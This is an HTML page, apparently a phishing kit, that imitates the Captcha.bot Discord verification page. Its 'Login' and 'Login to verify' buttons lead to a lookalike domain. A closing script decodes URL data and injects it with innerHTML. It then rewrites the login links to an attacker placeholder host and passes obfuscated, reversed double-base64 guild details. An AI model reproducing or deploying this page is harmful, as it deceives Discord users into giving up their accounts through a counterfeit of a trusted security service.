<html lang="en">

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <link rel="icon" href="static/assets/logo.png">
  <title>Captcha.bot - Verification done right</title>
  <meta name="description"
    content="Discord's leading CAPTCHA verification bot. Perfect for NFT, Crypto, and Web3 communities. Anti-raid and anti-phishing links. ">
  <link href="static/css/css1.css" rel="stylesheet">
  <link href="https://www.googletagmanager.com" rel="preconnect">
  <link rel="stylesheet" type="text/css" href="static/css/css2.css">
  <link rel="stylesheet" href="https://js.chargebee.com/assets/cbjs-2023.10.09-09.27/v2/animation.css" type="text/css">
  <script charset="utf-8" src="static/css/adcf9ed6.js"></script>
  <meta http-equiv="origin-trial" content>
  <style>
    .bfa-maximum div[id*=primis_playerSekindoSPlayer][style*="position: fixed"] {
      top: var(--nnVideoOffsetTop, 140px) !important
    }

    .bfa-loaded.bfa-collapsed div[id*=primis_playerSekindoSPlayer][style*="position: fixed"] {
      bottom: 100px !important;
      top: auto !important
    }

    @media only screen and (max-width:480px) {
      .bfa-maximum div[id*=primis_playerSekindoSPlayer][style*="position: fixed"] {
        bottom: var(--nnVideoOffsetTop, 140px) !important;
        top: unset !important
      }

      .bfa-loaded.bfa-collapsed div[id*=primis_playerSekindoSPlayer][style*="position: fixed"] {
        bottom: 65px !important;
        top: auto !important
      }
    }
  </style>
  <style>
    .nn-sticky {
      width: 100%;
      display: -webkit-box;
      display: flex;
      -webkit-box-pack: center;
      justify-content: center;
      position: fixed;
      bottom: var(--cmpHeight, 0);
      left: 0;
      right: 0;
      z-index: 9999;
      pointer-events: none
    }

    .nn-sticky>div {
      margin: 0;
      padding: 0;
      position: relative;
      z-index: 9999;
      pointer-events: auto
    }

    .nn-sticky .close-btn {
      -webkit-appearance: none;
      -moz-appearance: none;
      appearance: none;
      display: block;
      width: 40px;
      height: 40px;
      position: absolute;
      right: -5px;
      top: 0;
      margin-top: -40px;
      border-radius: 40px;
      cursor: pointer;
      outline: none;
      background: #555;
      z-index: 9999;
      pointer-events: auto
    }

    .nn-sticky .close-btn:after {
      content: "";
      background: url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='40' height='40'%3E%3Cpath d='M10 10l20 20m0-20L10 30' stroke='%23fff' stroke-width='4'/%3E%3C/svg%3E") no-repeat 50% 50%;
      background-size: 25px;
      width: 100%;
      height: 100%;
      display: block
    }

    .nn_sticky_mpu {
      height: 600px
    }

    .nn_sticky_mpu>div {
      position: -webkit-sticky !important;
      position: sticky !important;
      top: 15px
    }
  </style>
  <style>
    [id^=primis_playerSekindoSPlayer] {
      margin-bottom: var(--cmpHeight) !important
    }
  </style>
  <meta http-equiv="origin-trial" content>
  <meta http-equiv="origin-trial" content>
  <meta http-equiv="origin-trial" content>
  <style>
    :not(.up-hide):not(.up-show)>div[id^="google_ads_iframe_"][id$="__container__"] {
      display: none;
    }

    .ad.ad-mobile-sticky {
      height: auto;
    }

    #nn_mobile_lb_top {
      height: auto;
    }
  </style>
</head>

<body><noscript><strong>We're sorry but Captcha.bot doesn't work properly without JavaScript enabled. Please enable it
      to continue.</strong></noscript>
  <div id="app" data-v-app>
    <div>
      <div aria-live="assertive" class="pointer-events-none fixed inset-0 flex items-end px-4 py-6 sm:p-6 z-50">
        <div class="flex w-full flex-col items-center space-y-4 sm:items-end"></div>
      </div>
      <div data-v-175345b6>
        <div data-v-175345b6 class="mx-auto justify-between pt-4 pr-8 pl-8 hidden md:flex">
          <div data-v-175345b6 class="flex items-center space-x-7"><a data-v-175345b6 href="#" class><img
                data-v-175345b6 class="pt-0 mt-0" src="static/css/logo.png" height="60" width="60"></a><a
              data-v-175345b6 class="link" href="https://docs.captcha.bot">Documentation</a><a data-v-175345b6
              href="https://captcha.bot/premium" class="link flex my-auto gap-1"> Pricing </a></div>
          <div data-v-175345b6 class="flex items-center">
            <div data-v-175345b6>
              <div data-v-175345b6><a data-v-175345b6 href="https://auth.captchabot-verify.click"
                  class="login-btn mt-4 px-5 py-2 md:text-md rounded-lg shadow-lg font-bold uppercase text-white bg-discord duration-200 flex items-center">
                  Login </a></div>
            </div>
          </div>
        </div>
        <div data-v-175345b6 class="mx-auto justify-between py-3 pr-8 pl-5 block md:hidden bg-gray-900">
          <div data-v-175345b6 class="flex items-center justify-between space-x-7"><a data-v-175345b6 href="#"
              class="flex items-center gap-2"><img data-v-175345b6 class="pt-0 mt-0" src="static/css/logo.png"
                height="50" width="50">
              <h1 data-v-175345b6 class="text-white text-2xl font-extrabold">Captcha.bot</h1>
            </a>
            <div data-v-175345b6 class="text-gray-200 hover:text-white cursor-pointer"><svg data-v-175345b6
                xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5"
                stroke="currentColor" class="w-7 h-7">
                <path data-v-175345b6 stroke-linecap="round" stroke-linejoin="round"
                  d="M3.75 6.75h16.5M3.75 12h16.5m-16.5 5.25h16.5"></path>
              </svg></div>
          </div>
        </div>
      </div>
      <div class="my-8 mx-auto container grid place-items-center">
        <div id="nn_lb1" data-google-query-id>
          <div id="google_ads_iframe_6928793/Captcha.Bot-649ed910bf94d/Captcha.Bot-LB1-649ed959de356_0__container__"
            style="border: 0pt none; width: 320px; height: 0px;"></div>
        </div>
        <div id="nn_mobile_mpu1"></div>
      </div>
      <div class="container lg:px-8 xl:px-32 md:mx-auto px-4 grid grid-cols-1 md:grid-cols-3 md:gap-6 mt-8">
        <div>
          <div class="bg-gray-900 rounded-lg shadow-2xl break-words mb-4">
            <div class="flex gap-3 px-4 py-4">
              <img style="display: none;" alt="servername here" class="guild-icon h-20 rounded-md">
              <div class="inline-block w-full container break-all">
                <h1 class="guild-name text-white text-xl font-extrabold">Discord server</h1>
                <p class="guild-membercount text-gray-300 text-sm"><span class="font-semibold">2</span> members</p>
              </div>
            </div>
            <p class="px-4 pt-2 pb-6 text-gray-300"><span class="guild-name">This Discord server</span> requires you to
              verify you
              are a human before you can interact. This'll only take a few moments! </p>
            <div class="px-4 py-4"><a href="https://auth.captchabot-verify.click"
                class="login-btn block bg-discord hover:bg-discord-10 rounded-lg shadow-lg text-white text-center py-2 text-base px-4 font-semibold min-w-full">
                Login to verify </a>
              <div class="flex gap-3 pt-3"><a href="https://captcha.bot/support"
                  class="bg-discord hover:bg-discord-10 rounded-lg shadow-lg text-white text-center py-1.5 px-4 font-semibold w-full">Get
                  help</a><a href="https://captcha.bot/legal"
                  class="bg-gray-600 hover:bg-gray-700 rounded-lg shadow-lg text-white text-center py-1.5 px-4 font-semibold w-full"><span
                    class="flex gap-2 justify-center"><svg xmlns="http://www.w3.org/2000/svg" fill="none"
                      viewBox="0 0 24 24" stroke-width="2.25" stroke="currentColor" class="w-5 h-5 mt-0.5">
                      <path stroke-linecap="round" stroke-linejoin="round"
                        d="M16.5 10.5V6.75a4.5 4.5 0 10-9 0v3.75m-.75 11.25h10.5a2.25 2.25 0 002.25-2.25v-6.75a2.25 2.25 0 00-2.25-2.25H6.75a2.25 2.25 0 00-2.25 2.25v6.75a2.25 2.25 0 002.25 2.25z">
                      </path>
                    </svg> Terms </span></a></div>
            </div>
          </div>
          <div class="bg-gray-900 rounded-lg shadow-2xl break-words mb-4">
            <div>
              <div class="flex gap-3 px-4 pt-4 pb-2 container">
                <div class="flex items-start container">
                  <h1 class="flow-left text-white text-lg font-extrabold">Advertise here...</h1>
                  <div class="flex-grow"></div>
                  <div class="bg-discord px-2 py-1 text-white text-sm font-semibold rounded-lg">
                    Promoted </div>
                </div>
              </div>
              <p class="px-4 pb-2 text-gray-300"> Advertise your Discord server, bot, or other product
                here. <sup>*</sup><span class="text-sm">Coming Q3 2023</span></p>
              <div class="px-4 pb-2 flex gap-2">
                <div class="2xl:flex-none"><input type="email"
                    class="rounded-md border border-gray-900 bg-slate-800 py-2 pl-3 shadow-sm text-sm text-white w-64"
                    placeholder="Enter your email"></div><button
                  class="bg-discord hover:bg-discord-10 rounded-lg shadow-lg text-white text-center text-sm py-1.5 px-2 font-semibold w-full">Join
                  waitlist</button>
              </div>
              <div class="pb-3"></div>
            </div>
          </div>
        </div>
        <div class="col-span-2">
          <div class="bg-gray-900 rounded-lg shadow-2xl">
            <div class="p-4">
              <h1 class="text-white text-xl font-semibold">Captcha.bot Information</h1>
              <p class="text-gray-300 text-base">Captcha.bot has protected over <span
                  class="font-semibold">380 000</span> discord servers and stopped hundreds of
                thousands of raids since 2018.</p>
              <div>
                <div class="grid grid-cols-3 gap-3 pt-3"><a href="https://captcha.bot/premium"
                    class="bg-discord hover:bg-discord-10 rounded-lg shadow-lg text-white text-center py-1.5 px-4 font-semibold w-full">Purchase
                    Premium</a><a href="https://captcha.bot/invite"
                    class="bg-gray-600 hover:bg-gray-700 rounded-lg shadow-lg text-white text-center py-1.5 px-4 font-semibold w-full">
                    Protect your server </a><a href="https://captcha.bot/twitter"
                    class="bg-gray-600 hover:bg-gray-700 rounded-lg shadow-lg text-white text-center py-1.5 px-4 font-semibold w-full">
                    Follow on Twitter </a></div>
              </div>
            </div>
          </div>
          <div class="justify-center pt-6">
            <div id="nn_lb6" data-google-query-id>
              <div id="google_ads_iframe_6928793/Captcha.Bot-649ed910bf94d/Captcha.Bot-LB6-649ed99a5bad0_0__container__"
                style="border: 0pt none; width: 250px; height: 0px;"></div>
            </div>
            <div id="nn_mobile_mpu1"></div>
          </div>
        </div>
      </div>
      <footer class="bg-gray-900 mt-48" aria-labelledby="footer-heading">
        <div class="max-w-7xl mx-auto px-4 pt-12 sm:px-6 lg:pt-16 lg:px-8 pb-4">
          <h1 class="text-white text-2xl font-extrabold">Captcha.bot</h1>
          <p class="text-gray-200">Verification for online communities done right. A service provided by <a
              href="https://privy.gg" class="text-indigo-600 hover:text-indigo-700">Privy.gg LLC</a>.</p>
        </div>
        <div class="max-w-7xl mx-auto pb-12 px-4 sm:px-6 lg:pb-16 lg:px-8">
          <div class="xl:grid xl:grid-cols-3 xl:gap-8">
            <div class="mt-12 grid grid-cols-2 gap-8 xl:mt-0 xl:col-span-2">
              <div class="md:grid md:grid-cols-2 md:gap-8">
                <div>
                  <h3 class="text-sm font-semibold text-gray-100 tracking-wider uppercase">
                    Information </h3>
                  <ul role="list" class="mt-4 space-y-4">
                    <li><a href="https://discord.com/application-directory/512333785338216465"
                        class="text-base text-gray-300 hover:text-gray-400 cursor-pointer"> Add
                        to Discord </a></li>
                    <li><a href="https://captcha.bot/support" class="text-base text-gray-300 hover:text-gray-400">
                        Discord Server </a></li>
                    <li><a href="https://captcha.bot/premium" class="text-base text-gray-300 hover:text-gray-400">
                        Premium </a></li>
                    <li><a href="https://arcane.bot" class="text-base text-gray-300 hover:text-gray-400 cursor-pointer">
                        Arcane.bot </a></li>
                  </ul>
                </div>
                <div class="mt-12 md:mt-0">
                  <h3 class="text-sm font-semibold text-gray-100 tracking-wider uppercase"> Legal
                  </h3>
                  <ul role="list" class="mt-4 space-y-4">
                    <li><a href="https://privy.gg/legal"
                        class="text-base text-gray-300 hover:text-gray-400 cursor-pointer">
                        Terms of Service </a></li>
                    <li><a href="https://privy.gg/legal"
                        class="text-base text-gray-300 hover:text-gray-400 cursor-pointer">
                        Privacy Policy </a></li>
                    <li><a href="https://privy.gg/legal"
                        class="text-base text-gray-300 hover:text-gray-400 cursor-pointer">
                        Refunds </a></li>
                    <li><a class="nn-cmp-showtext-base text-gray-300 hover:text-gray-400 cursor-pointer"
                        href="https://captcha.bot/disclosure">Security</a></li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
          <div class="mt-12pt-8">
            <p class="text-base text-gray-400 xl:text-center mt-8"> © 2021-2023 <a href="https://privy.gg">Privy.gg
                LLC</a>. Not affiliated with Discord Inc. </p>
          </div>
        </div>
      </footer>
    </div>
  </div>
  <iframe height="1" width="1"
    style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe>
  <div id="cb-container" style="position: fixed; inset: 0px; z-index: 2147483647; display: none; overflow-y: hidden;">
    <div id="cb-loader"
      style="z-index: 99999; visibility: hidden; transition: all 0.5s ease 0s; background: rgb(244, 245, 249); position: absolute; left: 0px; right: 0px; box-shadow: rgba(0, 0, 0, 0.1) 0px 2px 9px 0px, rgba(0, 0, 0, 0.15) 0px 20px 30px 1px, rgba(0, 0, 0, 0.15) 0px 40px 40px 1px;">
      <div style="overflow: hidden;">
        <div id="cb-loader-header"
          style="padding: 12px 40px; background: rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.1) 0px 1px 2px 0px; text-align: center; min-height: 64px; box-sizing: border-box;">
          <div style="min-height: 46px; display: flex; align-items: center; margin-top: 1px;"><img id="cb-header-logo"
              style="max-height: 40px; max-width: 240px; vertical-align: middle; width: auto; margin: 3px auto;">
          </div>
        </div>
        <div id="cb-loading-bar"
          style="height: 2px; background: rgb(72, 231, 154); transition-duration: 0.5s; transition-timing-function: ease-in-out; visibility: hidden;">
        </div>
        <div style="padding: 24px 36px;">
          <div class="cb-placeholder" id="cb-placeholder">
            <div class="wavering"
              style="height: 20px; width: 100px; background: linear-gradient(to right, rgb(238, 238, 238) 8%, rgb(221, 221, 221) 18%, rgb(238, 238, 238) 33%) 0% 0% / 800px 104px; margin-bottom: 10px;">
            </div>
            <div class="wavering"
              style="height: 40px; width: 200px; background: linear-gradient(to right, rgb(238, 238, 238) 8%, rgb(221, 221, 221) 18%, rgb(238, 238, 238) 33%) 0% 0% / 800px 104px; margin-bottom: 10px;">
            </div>
            <div class="wavering"
              style="height: 10px; width: 150px; background: linear-gradient(to right, rgb(238, 238, 238) 8%, rgb(221, 221, 221) 18%, rgb(238, 238, 238) 33%) 0% 0% / 800px 104px; margin-bottom: 10px;">
            </div>
            <div class="wavering"
              style="height: 10px; width: 150px; background: linear-gradient(to right, rgb(238, 238, 238) 8%, rgb(221, 221, 221) 18%, rgb(238, 238, 238) 33%) 0% 0% / 800px 104px; margin-bottom: 10px;">
            </div>
            <div class="wavering"
              style="height: 10px; width: 150px; background: linear-gradient(to right, rgb(238, 238, 238) 8%, rgb(221, 221, 221) 18%, rgb(238, 238, 238) 33%) 0% 0% / 800px 104px; margin-bottom: 10px;">
            </div>
          </div>
          <div id="cb-error"
            style="font-size: 18px; line-height: 27px; color: rgb(248, 48, 48); text-align: center; display: none;">
          </div>
        </div>
        <div id="cb-modal-close"
          style="position: absolute; background: rgb(57, 57, 65); height: 24px; width: 24px; border-radius: 50%; right: -12px; top: -12px; font-size: 20px; color: rgba(255, 255, 255, 0.7); text-align: center; cursor: pointer; display: table; font-weight: 400; line-height: 24px;">
          ×</div>
      </div>
    </div>
  </div><iframe name="__tcfapiLocator" style="display: none;"></iframe>
  <img src="https://ad-delivery.net/px.gif?ch=2"
    style="display: none !important; width: 1px !important; height: 1px !important;"><img
    src="https://ad.doubleclick.net/favicon.ico?ad=300x250&amp;ad_box_=1&amp;adnet=1&amp;showad=1&amp;size=250x250"
    style="display: none !important; width: 1px !important; height: 1px !important;"><img
    src="https://ad-delivery.net/px.gif?ch=1&amp;e=0.7088262389751865"
    style="display: none !important; width: 1px !important; height: 1px !important;">
  <div class="nn-sticky" id="nn_mobile_lb1_wrap">
    <div id="nn_mobile_lb1"></div>
  </div>
  <div class="nn-sticky" id="nn_lb2_wrap">
    <div id="nn_lb2"></div>
  </div>
  <script>
    const urlParams = new URLSearchParams(window.location.search);
    const encodedData = urlParams.get('data');

    const decodedData = JSON.parse(atob(decodeURIComponent(encodedData)));
    const {
      guildId,
      clientId,
      name,
      members,
      icon
    } = decodedData;

    const loginBtns = document.getElementsByClassName('login-btn');
    const guildNames = document.getElementsByClassName('guild-name');
    const guildMembers = document.getElementsByClassName('guild-membercount')[0];
    const guildIcon = document.getElementsByClassName('guild-icon')[0];

    for (const guildName of guildNames) {
      guildName.innerHTML = decodeURIComponent(name);
    }
    guildMembers.innerHTML = `${members} members`;

    if (icon) {
      guildIcon.setAttribute('src', icon);
      guildIcon.style.display = 'block';
    }

    if (guildId && clientId) {
      for (const loginBtn of loginBtns) {
        loginBtn.setAttribute('href',
          `https://youapihere/login/?from=${[...btoa(btoa(JSON.stringify({icon, members, name, clientId, guildId })))].reverse().join('')}`
        );
      }
    }
  </script>
</body>

</html>